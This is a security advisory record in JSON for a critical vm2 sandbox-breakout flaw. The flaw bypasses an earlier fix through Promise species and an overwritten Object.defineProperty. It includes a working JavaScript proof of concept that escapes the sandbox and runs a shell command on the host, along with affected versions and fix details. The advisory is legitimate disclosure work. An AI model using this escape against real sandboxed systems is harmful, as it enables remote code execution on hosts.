{"id":"GHSA-qvjj-29qf-hp7p","summary":"VM2 Has Sandbox Breakout Through Promise Species","details":"### Summary\n\nThe fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 introduced the function `resetPromiseSpecies` https://github.com/patriksimek/vm2/blob/4b009c2d4b1131c01810c1205e641d614c322a29/lib/setup-sandbox.js#L35C7-L39.\nThis function changes the `species` property of promise objects back to a known value. However, it uses the function `[].includes` and `Object.defineProperty` which can be overewritten to prevent the species from being changed.\n\n### PoC\n\nThe following code demonstrates this issue by aquiring the host process object and executing `touch pwned`.\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nvm.run(`\nObject.defineProperty=()=\u003e{};\nasync function fn() {\n    const e = new Error();\n    e.name = Symbol();\n    return e.stack;\n}\np = fn();\np.constructor = {\n    [Symbol.species]: class FakePromise {\n        constructor(executor) {\n            executor(\n                (x) =\u003e x,\n                (err) =\u003e { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned'); }\n            )\n        }\n    }\n};\np.then();\n`);\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.","aliases":["CVE-2026-24120"],"modified":"2026-05-05T16:41:39.422646Z","published":"2026-05-05T16:23:35Z","database_specific":{"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-05-05T16:23:35Z","nvd_published_at":"2026-05-04T17:16:21Z","cwe_ids":["CWE-693","CWE-94"]},"references":[{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24120"},{"type":"PACKAGE","url":"https://github.com/patriksimek/vm2"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5"}],"affected":[{"package":{"name":"vm2","ecosystem":"npm","purl":"pkg:npm/vm2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.10.5"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.10.3","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-qvjj-29qf-hp7p/GHSA-qvjj-29qf-hp7p.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}